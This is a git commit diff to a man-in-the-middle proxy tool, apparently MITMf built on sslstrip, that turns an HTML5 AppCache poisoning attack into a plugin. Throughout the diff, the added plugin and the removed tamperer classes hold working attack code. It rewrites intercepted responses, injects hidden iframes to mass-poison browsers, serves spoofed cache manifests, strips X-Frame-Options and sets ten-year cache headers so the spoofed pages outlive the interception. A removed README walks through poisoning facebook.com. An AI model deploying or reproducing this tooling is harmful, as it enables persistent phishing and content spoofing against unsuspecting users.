Revamped the appoison plugin and fixed some bugs

This commit is contained in:
byt3bl33d3r 2014-12-15 17:00:05 +01:00
parent ca28de91f6
commit 0defaf7b86
12 changed files with 223 additions and 333 deletions

View file

@ -3,10 +3,6 @@
; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack. ; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
; generic settings for tampering engine ; generic settings for tampering engine
enabled=True
tamper_class=libs.sslstripkoto.AppCachePoisonClass
;all settings below are specific for AppCachePoison
templates_path=config/app_cache_poison_templates templates_path=config/app_cache_poison_templates
;enable_only_in_useragents=Chrome|Firefox ;enable_only_in_useragents=Chrome|Firefox

View file

@ -105,8 +105,12 @@ class ClientRequest(Request):
pass pass
url = 'http://' + host + path url = 'http://' + host + path
self.uri = url # set URI to absolute
self.dnsCache.cacheResolution(host, address) #self.dnsCache.cacheResolution(host, address)
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)): if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...") logging.debug("Sending expired cookies...")
@ -121,7 +125,12 @@ class ClientRequest(Request):
self.urlMonitor.getSecurePort(client, url)) self.urlMonitor.getSecurePort(client, url))
else: else:
logging.debug("Sending request via HTTP...") logging.debug("Sending request via HTTP...")
self.proxyViaHTTP(address, self.method, path, postData, headers) #self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error): def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error)) logging.warning("Host resolution error: " + str(error))
@ -143,15 +152,18 @@ class ClientRequest(Request):
def process(self): def process(self):
logging.debug("Resolving host: %s" % (self.getHeader('host'))) logging.debug("Resolving host: %s" % (self.getHeader('host')))
host = self.getHeader('host') host = self.getHeader('host')
deferred = self.resolveHost(host) #deferred = self.resolveHost(host)
hostparts = host.split(':')
deferred = self.resolveHost(hostparts[0])
deferred.addCallback(self.handleHostResolvedSuccess) deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError) deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers): def proxyViaHTTP(self, host, method, path, postData, headers, port):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection connectionFactory.protocol = ServerConnection
self.reactor.connectTCP(host, 80, connectionFactory) #self.reactor.connectTCP(host, 80, connectionFactory)
self.reactor.connectTCP(host, port, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port): def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory() clientContextFactory = ssl.ClientContextFactory()

View file

@ -20,7 +20,6 @@ import logging, re, string, random, zlib, gzip, StringIO, sys
import plugins import plugins
from twisted.web.http import HTTPClient from twisted.web.http import HTTPClient
from libs.sslstripkoto.ResponseTampererFactory import ResponseTampererFactory
from URLMonitor import URLMonitor from URLMonitor import URLMonitor
from libs.sergioproxy.ProxyPlugins import ProxyPlugins from libs.sergioproxy.ProxyPlugins import ProxyPlugins
@ -43,7 +42,6 @@ class ServerConnection(HTTPClient):
self.headers = headers self.headers = headers
self.client = client self.client = client
self.urlMonitor = URLMonitor.getInstance() self.urlMonitor = URLMonitor.getInstance()
self.responseTamperer = ResponseTampererFactory.getTampererInstance()
self.plugins = ProxyPlugins.getInstance() self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False self.isImageRequest = False
self.isCompressed = False self.isCompressed = False
@ -88,7 +86,7 @@ class ServerConnection(HTTPClient):
def sendHeaders(self): def sendHeaders(self):
for header, value in self.headers.items(): for header, value in self.headers.items():
logging.debug("Sending header: %s : %s" % (header, value)) logging.debug("Sending header: (%s => %s)" % (header, value))
self.sendHeader(header, value) self.sendHeader(header, value)
self.endHeaders() self.endHeaders()
@ -145,6 +143,8 @@ class ServerConnection(HTTPClient):
else: else:
self.client.setHeader(key, value) self.client.setHeader(key, value)
logging.debug("Receiving header: (%s => %s)" % (key, value))
def handleEndHeaders(self): def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None): if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength) self.client.setHeader("Content-Length", self.contentLength)
@ -175,11 +175,6 @@ class ServerConnection(HTTPClient):
logging.debug("Read from server:\n" + data) logging.debug("Read from server:\n" + data)
data = self.replaceSecureLinks(data) data = self.replaceSecureLinks(data)
#Hook the ResponseTampererFactory
if self.responseTamperer:
data = self.responseTamperer.tamper(self.client.uri, data, self.client.responseHeaders, self.client.getAllHeaders(), self.client.getClientIP())
res = self.plugins.hook() res = self.plugins.hook()
data = res['data'] data = res['data']

View file

@ -32,6 +32,7 @@ class URLMonitor:
def __init__(self): def __init__(self):
self.strippedURLs = set() self.strippedURLs = set()
self.strippedURLPorts = {} self.strippedURLPorts = {}
self.redirects = []
self.faviconReplacement = False self.faviconReplacement = False
def isSecureLink(self, client, url): def isSecureLink(self, client, url):
@ -66,6 +67,19 @@ class URLMonitor:
else: else:
return 443 return 443
def addRedirection(self, from_url, to_url):
    """Record that from_url redirects to to_url, merging into an existing group if one contains from_url."""
    for group in self.redirects:
        if from_url in group:
            group.add(to_url)
            return
    # from_url not seen before: start a new equivalence group
    self.redirects.append({from_url, to_url})
def getRedirectionSet(self, url):
    """Return the group of URLs equivalent to `url` via recorded redirects (or just {url})."""
    matches = (group for group in self.redirects if url in group)
    found = next(matches, None)
    # an unknown URL is only equivalent to itself
    return found if found is not None else set([url])
def addSecureLink(self, client, url): def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2 methodIndex = url.find("//") + 2
method = url[0:methodIndex] method = url[0:methodIndex]

View file

@ -1,154 +0,0 @@
import logging, re, os.path, time
from datetime import date
from libs.sslstripkoto.DummyResponseTamperer import DummyResponseTamperer
class AppCachePoisonClass(DummyResponseTamperer):

    '''
    AppCachePoison performs an HTML5 AppCache poisoning attack - see
    http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
    '''

    # Class-level on purpose: browser ids (ip + user-agent) that were already
    # mass-poisoned, shared so each browser is only poisoned once per run.
    mass_poisoned_browsers = []

    def tamper(self, url, data, headers, req_headers, ip):
        """Tamper hook: poison `data` (the response body for `url`) when a config
        section matches; otherwise try opportunistic mass poisoning.

        headers     -- response Headers object (mutated in place)
        req_headers -- dict of request headers
        ip          -- client IP, used to build the per-browser poison id
        Returns the (possibly modified) response body.
        """
        if not self.isEnabled():
            return data

        # Optional user-agent whitelist from the config file.
        if "enable_only_in_useragents" in self.config:
            regexp = self.config["enable_only_in_useragents"]
            # .get(): a request without a User-Agent header must not crash the proxy
            if regexp and not re.search(regexp, req_headers.get("user-agent", "")):
                logging.log(logging.DEBUG, "Tampering disabled in this useragent (%s)" % (req_headers.get("user-agent")))
                return data

        # Treat every URL in the same redirection group as equivalent.
        urls = self.urlMonitor.getRedirectionSet(url)
        (s, element, url) = self.getSectionForUrls(urls)

        if not s:
            # No config section matched - fall back to mass poisoning.
            data = self.tryMassPoison(url, data, headers, req_headers, ip)
            return data

        logging.log(logging.WARNING, "Found URL %s in section %s" % (url, s['__name__']))
        p = self.getTemplatePrefix(s)

        if element == 'tamper':
            logging.log(logging.WARNING, "Poisoning tamper URL with template %s" % (p))
            if os.path.exists(p + '.replace'):  # replace whole content
                with open(p + '.replace', 'r') as f:
                    data = self.decorate(f.read(), s)
            elif os.path.exists(p + '.append'):  # append file to body
                with open(p + '.append', 'r') as f:
                    appendix = self.decorate(f.read(), s)
                # append to body
                data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data)
            # add manifest reference so the browser caches the poisoned page
            data = re.sub(re.compile("<html", re.IGNORECASE), "<html manifest=\"" + self.getManifestUrl(s) + "\"", data)

        elif element == "manifest":
            logging.log(logging.WARNING, "Poisoning manifest URL")
            data = self.getSpoofedManifest(url, s)
            headers.setRawHeaders("Content-Type", ["text/cache-manifest"])

        elif element == "raw":  # raw resource to modify, it does not have to be html
            logging.log(logging.WARNING, "Poisoning raw URL")
            if os.path.exists(p + '.replace'):  # replace whole content
                with open(p + '.replace', 'r') as f:
                    data = self.decorate(f.read(), s)
            elif os.path.exists(p + '.append'):  # append file to body
                with open(p + '.append', 'r') as f:
                    appendix = self.decorate(f.read(), s)
                # append to response body
                data += appendix

        self.cacheForFuture(headers)
        self.removeDangerousHeaders(headers)
        return data

    def tryMassPoison(self, url, data, headers, req_headers, ip):
        """Inject hidden iframes pointing at the configured tamper URLs into any
        HTML response, once per browser id, so the AppCache poison spreads."""
        browser_id = ip + req_headers.get("user-agent", "")

        if not 'mass_poison_url_match' in self.config:  # no url
            return data
        if browser_id in self.mass_poisoned_browsers:  # already poisoned
            return data
        if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]):  # not HTML
            return data
        # BUG FIX: only apply the user-agent filter when it is configured; the
        # old code unconditionally indexed self.config['mass_poison_useragent_match']
        # and raised KeyError whenever that option was absent.
        if 'mass_poison_useragent_match' in self.config:
            if "user-agent" not in req_headers:
                return data
            if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']):  # different UA
                return data
        if not re.search(self.config['mass_poison_url_match'], url):  # different url
            return data

        logging.log(logging.WARNING, "Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
        appendix = self.getMassPoisonHtml()
        data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data)
        self.mass_poisoned_browsers.append(browser_id)  # mark to avoid mass spoofing for this ip
        return data

    def getMassPoisonHtml(self):
        """Build the invisible-iframe HTML used for mass poisoning, one iframe
        per config section that declares a tamper_url."""
        html = "<div style=\"position:absolute;left:-100px\">"
        for i in self.config:
            if isinstance(self.config[i], dict):
                # 'in' instead of deprecated dict.has_key()
                if 'tamper_url' in self.config[i] and not self.config[i].get('skip_in_mass_poison', False):
                    html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"
        return html + "</div>"

    def cacheForFuture(self, headers):
        """Rewrite caching headers so the poisoned response stays cached ~10 years."""
        ten_years = 315569260  # seconds
        headers.setRawHeaders("Cache-Control", ["max-age=" + str(ten_years)])
        headers.setRawHeaders("Last-Modified", ["Mon, 29 Jun 1998 02:28:12 GMT"])  # it was modified long ago, so is most likely fresh
        in_ten_years = date.fromtimestamp(time.time() + ten_years)
        headers.setRawHeaders("Expires", [in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])

    def removeDangerousHeaders(self, headers):
        # X-Frame-Options would block the hidden-iframe mass poisoning
        headers.removeHeader("X-Frame-Options")

    def getSpoofedManifest(self, url, section):
        """Return the poisoned cache-manifest body for `section`, falling back to
        the default template when the section has no .manifest file."""
        p = self.getTemplatePrefix(section)
        if not os.path.exists(p + '.manifest'):
            p = self.getDefaultTemplatePrefix()
        with open(p + '.manifest', 'r') as f:
            manifest = f.read()
        return self.decorate(manifest, section)

    def decorate(self, content, section):
        """Substitute %%key%% placeholders in `content` with the section's values."""
        for i in section:
            content = content.replace("%%" + i + "%%", section[i])
        return content

    def getTemplatePrefix(self, section):
        """Path prefix of the template files for `section` (or the default)."""
        if 'templates' in section:
            return self.config['templates_path'] + '/' + section['templates']
        return self.getDefaultTemplatePrefix()

    def getDefaultTemplatePrefix(self):
        return self.config['templates_path'] + '/default'

    def getManifestUrl(self, section):
        # /robots.txt is the default manifest URL to poison
        return section.get("manifest_url", '/robots.txt')

    def getSectionForUrls(self, urls):
        """Find the first config section matching any URL in `urls`.

        Returns (section, element, url) where element is one of
        'tamper' / 'manifest' / 'raw', or (False, '', some_url) when nothing matches.
        """
        for url in urls:
            for i in self.config:
                if isinstance(self.config[i], dict):  # section
                    section = self.config[i]
                    if section.get('tamper_url', False) == url:
                        return (section, 'tamper', url)
                    if 'tamper_url_match' in section and re.search(section['tamper_url_match'], url):
                        return (section, 'tamper', url)
                    if section.get('manifest_url', False) == url:
                        return (section, 'manifest', url)
                    if section.get('raw_url', False) == url:
                        return (section, 'raw', url)
        # no match: return an arbitrary member of the set (copy so we don't mutate it)
        return (False, '', urls.copy().pop())

View file

@ -1,47 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike, Krzysztof Kotowicz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from libs.sslstrip.URLMonitor import URLMonitor
class DummyResponseTamperer:
    '''
    Base/no-op response tamperer: an example of the tampering interface.
    Concrete tamperers subclass this and override tamper(); this
    implementation passes every server response through unchanged.
    '''

    def __init__(self, config):
        self.config = config
        self.urlMonitor = URLMonitor.getInstance()
        logging.log(logging.DEBUG, "Tampering enabled.")

    def isEnabled(self):
        # the flag comes straight from the parsed config
        return self.config["enabled"]

    def tamper(self, url, data, headers, req_headers, ip):
        # `headers` is a twisted.web.http_headers.Headers - see
        # http://twistedmatrix.com/documents/10.1.0/api/twisted.web.http_headers.Headers.html
        #   headers.setRawHeaders("X-aaa", ["aaa"])   # setting headers
        #   headers.getRawHeaders("Content-Type")     # getting headers
        if not self.isEnabled():
            return data
        return data

View file

@ -1,44 +0,0 @@
I've modified sslstrip to be able to tamper with server responses.
One prepared example of tampering attack is HTML5 AppCache poisoning attack that places the
modified responses in the browser's long-lasting HTML5 AppCache, so that the spoofing continues
even after the victim is no longer MITMed.
Exemplary response tampering with HTML AppCachePoison:
1) python sslstrip.py -t app_cache_poison/config.ini
2) While under MITM, visit http://example.com to display tampered content
3) Visit http://www.facebook.com in AppCache supporting browser (Chrome, Firefox, Opera, Safari).
In Firefox you have to agree to store offline content, Chrome does not display any confirmations.
4) Stop MITM, restart browser, go for coffee or holidays
5) Visit http://www.facebook.com again - the spoofed content is still there!
As a bonus, once the HTTP version of the Google Analytics script is requested, its spoofed content will be cached for 10 years.
EASY LOCAL TESTING MITM (for Ubuntu systems):
# create sslstrip admin user
# forward local traffic
$ sudo ./testmitm.sh start `id -u sslstrip`
# run sslstrip to hijack traffic
$ chown -R sslstrip /path/to/sslstrip/
$ su sslstrip
$ python sslstrip.py -t app_cache_poison/config.ini -p
# stop
$ sudo ./testmitm.sh stop
More info:
http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
This functionality has been added by Krzysztof Kotowicz
<kkotowicz at gmail dot com>

View file

@ -1,62 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike, Krzysztof Kotowicz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, ConfigParser
class ResponseTampererFactory:
    '''
    ResponseTampererFactory creates the (singleton) response tamperer that
    modifies responses to clients, based on a config file setting.
    '''

    # singleton instance, set by buildTamperer()
    _instance = None
    _default_config = {"enabled": False, "tamper_class": "libs.sslstripkoto.DummyResponseTamperer"}

    def __init__(self):
        pass

    # NOTE: modernized from the legacy `name = staticmethod(name)` trailing
    # assignments to @staticmethod decorators - behavior is identical.
    @staticmethod
    def createTamperer(configFile):
        """Instantiate the configured tamper class; returns None when disabled."""
        logging.log(logging.DEBUG, "Reading tamper config file: %s" % (configFile))
        config = ResponseTampererFactory._default_config.copy()
        if configFile:
            config.update(ResponseTampererFactory.parseConfig(configFile))
        if config['enabled']:
            logging.log(logging.DEBUG, "Loading tamper class: %s" % (config["tamper_class"]))
            # import the configured module and instantiate the class of the same name
            m = __import__(config["tamper_class"], globals(), locals(), config["tamper_class"])
            return getattr(m, m.__name__.replace(m.__package__ + ".", ''))(config)

    @staticmethod
    def parseConfig(configFile):
        """Parse the INI file into a plain dict of sections plus defaults."""
        config = ConfigParser.ConfigParser()
        config.read(configFile)
        readConfig = config._sections  # NOTE: relies on a private ConfigParser attribute
        readConfig.update(config.defaults())
        return readConfig

    @staticmethod
    def getTampererInstance():
        """Return the singleton tamperer (None until buildTamperer() ran)."""
        return ResponseTampererFactory._instance

    @staticmethod
    def buildTamperer(configFile):
        """Create the singleton tamperer once; later calls are no-ops."""
        if ResponseTampererFactory._instance is None:
            ResponseTampererFactory._instance = ResponseTampererFactory.createTamperer(configFile)

View file

@ -20,7 +20,6 @@ import logging, re, string, random, zlib, gzip, StringIO
import plugins import plugins
from twisted.web.http import HTTPClient from twisted.web.http import HTTPClient
from libs.ssltripkoto.ResponseTampererFactory import ResponseTampererFactory
from URLMonitor import URLMonitor from URLMonitor import URLMonitor
from libs.sergioproxy.ProxyPlugins import ProxyPlugins from libs.sergioproxy.ProxyPlugins import ProxyPlugins
@ -174,11 +173,6 @@ class ServerConnection(HTTPClient):
#logging.log(self.getLogLevel(), "Read from server:\n <large data>" ) #logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data) data = self.replaceSecureLinks(data)
#Hook the ResponseTampererFactory
if self.responseTamperer:
data = self.responseTamperer.tamper(self.client.uri, data, self.client.responseHeaders, self.client.getAllHeaders(), self.client.getClientIP())
res = self.plugins.hook() res = self.plugins.hook()
data = res['data'] data = res['data']

View file

@ -25,6 +25,7 @@ class URLMonitor:
def __init__(self): def __init__(self):
self.strippedURLs = set() self.strippedURLs = set()
self.strippedURLPorts = {} self.strippedURLPorts = {}
self.redirects = []
self.faviconReplacement = False self.faviconReplacement = False
hsts_config = ConfigObj("./config/hsts_bypass.cfg") hsts_config = ConfigObj("./config/hsts_bypass.cfg")
@ -65,6 +66,19 @@ class URLMonitor:
else: else:
return 443 return 443
def addRedirection(self, from_url, to_url):
    """Record that from_url redirects to to_url, merging into an existing group if one contains from_url."""
    for group in self.redirects:
        if from_url in group:
            group.add(to_url)
            return
    # from_url not seen before: start a new equivalence group
    self.redirects.append({from_url, to_url})
def getRedirectionSet(self, url):
    """Return the group of URLs equivalent to `url` via recorded redirects (or just {url})."""
    matches = (group for group in self.redirects if url in group)
    found = next(matches, None)
    # an unknown URL is only equivalent to itself
    return found if found is not None else set([url])
def addSecureLink(self, client, url): def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2 methodIndex = url.find("//") + 2
method = url[0:methodIndex] method = url[0:methodIndex]

View file

@ -1,17 +1,189 @@
#
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
#######################################################################################################
from plugins.plugin import Plugin from plugins.plugin import Plugin
from libs.sslstripkoto.ResponseTampererFactory import ResponseTampererFactory from datetime import date
#import threading from libs.sslstrip.URLMonitor import URLMonitor
import logging
import ConfigParser
import re
import os.path
import time
class AppCachePlugin(Plugin):
    """MITMf plugin: performs the HTML5 AppCache poisoning attack - see
    http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
    """
    name = "App Cache Poison"
    optname = "appoison"
    desc = "Performs App Cache Poisoning attacks"
    implements = ["handleResponse"]
    has_opts = False

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.config_file = "./config/app_cache_poison.cfg"
        self.config = None
        # browser ids (ip + user-agent) that have already been mass-poisoned
        self.mass_poisoned_browsers = []
        self.urlMonitor = URLMonitor.getInstance()

        # parentheses make this valid under both Python 2 and 3; output is identical
        print("[*] App Cache Poison plugin online")
        self.createTamperer(self.config_file)

    def parseConfig(self, configFile):
        """Parse the INI config file into a plain dict of sections plus defaults."""
        config = ConfigParser.ConfigParser()
        config.read(configFile)
        readConfig = config._sections  # NOTE: relies on a private ConfigParser attribute
        readConfig.update(config.defaults())
        return readConfig

    def createTamperer(self, configFile):
        """Load the poisoning configuration into self.config."""
        logging.debug("Reading tamper config file: %s" % (configFile))
        self.config = self.parseConfig(configFile)

    def handleResponse(self, request, data):
        """Plugin hook: poison the response body when a config section matches
        the request URL; otherwise try opportunistic mass poisoning.

        Returns {'request': request, 'data': body} as the plugin API expects.
        """
        url = request.client.uri
        req_headers = request.client.getAllHeaders()
        headers = request.client.responseHeaders
        ip = request.client.getClientIP()

        # Optional user-agent whitelist from the config file.
        if "enable_only_in_useragents" in self.config:
            regexp = self.config["enable_only_in_useragents"]
            # .get(): a request without a User-Agent header must not crash the proxy
            if regexp and not re.search(regexp, req_headers.get("user-agent", "")):
                logging.debug("Tampering disabled in this useragent (%s)" % (req_headers.get("user-agent")))
                return {'request': request, 'data': data}

        # Treat every URL in the same redirection group as equivalent.
        urls = self.urlMonitor.getRedirectionSet(url)
        (s, element, url) = self.getSectionForUrls(urls)

        if not s:
            # No config section matched - fall back to mass poisoning.
            data = self.tryMassPoison(url, data, headers, req_headers, ip)
            return {'request': request, 'data': data}

        logging.debug("Found URL %s in section %s" % (url, s['__name__']))
        p = self.getTemplatePrefix(s)

        if element == 'tamper':
            logging.debug("Poisoning tamper URL with template %s" % (p))
            if os.path.exists(p + '.replace'):  # replace whole content
                with open(p + '.replace', 'r') as f:
                    data = self.decorate(f.read(), s)
            elif os.path.exists(p + '.append'):  # append file to body
                with open(p + '.append', 'r') as f:
                    appendix = self.decorate(f.read(), s)
                # append to body
                data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data)
            # add manifest reference so the browser caches the poisoned page
            data = re.sub(re.compile("<html", re.IGNORECASE), "<html manifest=\"" + self.getManifestUrl(s) + "\"", data)

        elif element == "manifest":
            logging.debug("Poisoning manifest URL")
            data = self.getSpoofedManifest(url, s)
            headers.setRawHeaders("Content-Type", ["text/cache-manifest"])

        elif element == "raw":  # raw resource to modify, it does not have to be html
            logging.debug("Poisoning raw URL")
            if os.path.exists(p + '.replace'):  # replace whole content
                with open(p + '.replace', 'r') as f:
                    data = self.decorate(f.read(), s)
            elif os.path.exists(p + '.append'):  # append file to body
                with open(p + '.append', 'r') as f:
                    appendix = self.decorate(f.read(), s)
                # append to response body
                data += appendix

        self.cacheForFuture(headers)
        self.removeDangerousHeaders(headers)
        return {'request': request, 'data': data}

    def tryMassPoison(self, url, data, headers, req_headers, ip):
        """Inject hidden iframes pointing at the configured tamper URLs into any
        HTML response, once per browser id, so the AppCache poison spreads."""
        browser_id = ip + req_headers.get("user-agent", "")

        if not 'mass_poison_url_match' in self.config:  # no url
            return data
        if browser_id in self.mass_poisoned_browsers:  # already poisoned
            return data
        if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]):  # not HTML
            return data
        # BUG FIX: only apply the user-agent filter when it is configured; the
        # old code unconditionally indexed self.config['mass_poison_useragent_match']
        # and raised KeyError whenever that option was absent.
        if 'mass_poison_useragent_match' in self.config:
            if "user-agent" not in req_headers:
                return data
            if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']):  # different UA
                return data
        if not re.search(self.config['mass_poison_url_match'], url):  # different url
            return data

        logging.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
        appendix = self.getMassPoisonHtml()
        data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data)
        self.mass_poisoned_browsers.append(browser_id)  # mark to avoid mass spoofing for this ip
        return data

    def getMassPoisonHtml(self):
        """Build the invisible-iframe HTML used for mass poisoning, one iframe
        per config section that declares a tamper_url."""
        html = "<div style=\"position:absolute;left:-100px\">"
        for i in self.config:
            if isinstance(self.config[i], dict):
                # 'in' instead of deprecated dict.has_key()
                if 'tamper_url' in self.config[i] and not self.config[i].get('skip_in_mass_poison', False):
                    html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"
        return html + "</div>"

    def cacheForFuture(self, headers):
        """Rewrite caching headers so the poisoned response stays cached ~10 years."""
        ten_years = 315569260  # seconds
        headers.setRawHeaders("Cache-Control", ["max-age=" + str(ten_years)])
        headers.setRawHeaders("Last-Modified", ["Mon, 29 Jun 1998 02:28:12 GMT"])  # it was modified long ago, so is most likely fresh
        in_ten_years = date.fromtimestamp(time.time() + ten_years)
        headers.setRawHeaders("Expires", [in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])

    def removeDangerousHeaders(self, headers):
        # X-Frame-Options would block the hidden-iframe mass poisoning
        headers.removeHeader("X-Frame-Options")

    def getSpoofedManifest(self, url, section):
        """Return the poisoned cache-manifest body for `section`, falling back to
        the default template when the section has no .manifest file."""
        p = self.getTemplatePrefix(section)
        if not os.path.exists(p + '.manifest'):
            p = self.getDefaultTemplatePrefix()
        with open(p + '.manifest', 'r') as f:
            manifest = f.read()
        return self.decorate(manifest, section)

    def decorate(self, content, section):
        """Substitute %%key%% placeholders in `content` with the section's values."""
        for i in section:
            content = content.replace("%%" + i + "%%", section[i])
        return content

    def getTemplatePrefix(self, section):
        """Path prefix of the template files for `section` (or the default)."""
        if 'templates' in section:
            return self.config['templates_path'] + '/' + section['templates']
        return self.getDefaultTemplatePrefix()

    def getDefaultTemplatePrefix(self):
        return self.config['templates_path'] + '/default'

    def getManifestUrl(self, section):
        # /robots.txt is the default manifest URL to poison
        return section.get("manifest_url", '/robots.txt')

    def getSectionForUrls(self, urls):
        """Find the first config section matching any URL in `urls`.

        Returns (section, element, url) where element is one of
        'tamper' / 'manifest' / 'raw', or (False, '', some_url) when nothing matches.
        """
        for url in urls:
            for i in self.config:
                if isinstance(self.config[i], dict):  # section
                    section = self.config[i]
                    if section.get('tamper_url', False) == url:
                        return (section, 'tamper', url)
                    if 'tamper_url_match' in section and re.search(section['tamper_url_match'], url):
                        return (section, 'tamper', url)
                    if section.get('manifest_url', False) == url:
                        return (section, 'manifest', url)
                    if section.get('raw_url', False) == url:
                        return (section, 'raw', url)
        # no match: return an arbitrary member of the set (copy so we don't mutate it)
        return (False, '', urls.copy().pop())